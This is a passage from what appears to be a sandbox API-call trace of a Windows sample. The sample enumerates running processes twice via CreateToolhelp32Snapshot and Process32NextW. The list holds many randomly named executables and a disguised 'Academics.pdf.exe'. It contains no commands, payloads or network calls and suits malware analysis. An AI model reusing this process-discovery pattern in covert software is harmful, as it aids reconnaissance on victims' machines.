th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.753] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.754] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0308.757] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.758] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0308.759] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0308.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0308.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0308.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0308.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0308.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0308.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0308.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0308.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0308.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0308.767] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0308.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0308.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0308.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0308.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0308.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0308.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0308.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0308.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0308.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0308.778] CloseHandle (hObject=0x294) returned 1 [0308.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0308.779] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0308.779] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.781] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.785] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.787] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.788] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.790] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.791] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.793] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.795] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.796] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.797] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0308.799] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0308.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0308.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0308.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0308.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0308.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0308.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0308.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0308.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0308.807] 